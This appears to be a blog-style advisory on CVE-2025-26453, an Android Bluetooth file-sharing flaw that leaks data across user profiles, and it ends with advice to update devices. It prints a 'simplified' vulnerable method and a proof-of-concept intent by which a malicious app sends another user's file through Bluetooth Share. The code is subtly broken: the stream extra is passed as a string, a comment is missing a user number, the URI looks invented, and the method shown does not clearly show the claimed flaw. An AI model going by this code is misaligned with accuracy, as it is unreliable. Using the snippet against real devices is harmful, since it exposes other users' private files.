CVE-2025-26453 - Understanding a Cross-User Data Leak in BluetoothOppSendFileInfo.java

A new vulnerability, CVE-2025-26453, has been discovered in the Android operating system, specifically in the Bluetooth file sharing feature. This vulnerability affects the BluetoothOppSendFileInfo.java file and could allow an attacker to access data from another user profile on the same device. This exploit does not require user interaction or additional permissions, making it a serious risk if left unpatched. In this post, we’ll break down how it works, what the code looks like, and how it can be exploited.

What is CVE-2025-26453?

This vulnerability is due to a logic error in the method isContentUriForOtherUser within the BluetoothOppSendFileInfo.java file. If exploited, it allows a local attacker to leak data across user boundaries—potentially revealing sensitive information belonging to another user on the same Android device.

How the Exploit Works

Android devices are designed to support multiple user profiles, mainly for privacy. Each user's data is supposed to be isolated. Unfortunately, flaws like this can break that isolation.

Here’s a simplified version of the relevant method

// This function should check if the given URI points to a file owned by another user.
private static boolean isContentUriForOtherUser(Uri uri, int userId) {
    // Logic error: the user check is not properly enforced
    int uriUserId = ContentProvider.getUserIdFromUri(uri);
    if (uriUserId != userId && uriUserId != USER_NULL) {
        return true;
    }
    // Missing: Should check for more edge cases
    return false;
}

The function does not correctly or completely verify whether the target URI belongs to another user.

- This oversight lets a local attacker (an app, for instance) craft a content URI that references another user's private data.
- No special permissions are needed. The attacker can simply use a malicious app that triggers a Bluetooth file transfer.

User 10 (secondary profile)

A malicious app running as User 10 could send a handcrafted intent to the Bluetooth sharing component:

Intent sendIntent = new Intent();
sendIntent.setAction(Intent.ACTION_SEND);
sendIntent.setType("text/plain");

// Craft a content URI that targets User 's (owner's) file
sendIntent.putExtra(Intent.EXTRA_STREAM, "content://com.android.providers.user/private_files/secret.txt");

// Start the Bluetooth Share activity
context.startActivity(sendIntent);

Because the logic in isContentUriForOtherUser is broken, this malicious intent will be processed as if it’s from the current user, whereas it actually points to files belonging to another user.

As a result, BluetoothOppSendFileInfo could read the data, and leak it to an external device or app.

No special privileges: Any app can try this; no root or special permissions are required.

- Privacy risk: Sensitive files or information from a different user profile can be silently exfiltrated.

Protecting Yourself

- Update your device: Google and Android vendors have released patches for this issue. Updating to the latest security patch level is essential.

References

- Android Open Source Project Issue Tracker (reference bug)
- Android Security Bulletin, June 2025
- Android Bluetooth OPP Source Code

Conclusion

CVE-2025-26453 is a stark reminder that multi-user environments are hard to design and easy to break with small oversights. Android’s Bluetooth sharing relied on a logic check that wasn’t thorough enough, enabling local attackers to pierce user data boundaries. If you haven’t updated your Android device lately, now is the time.

Timeline

Published on: 09/04/2025 18:15:45 UTC
Last modified on: 09/08/2025 14:12:14 UTC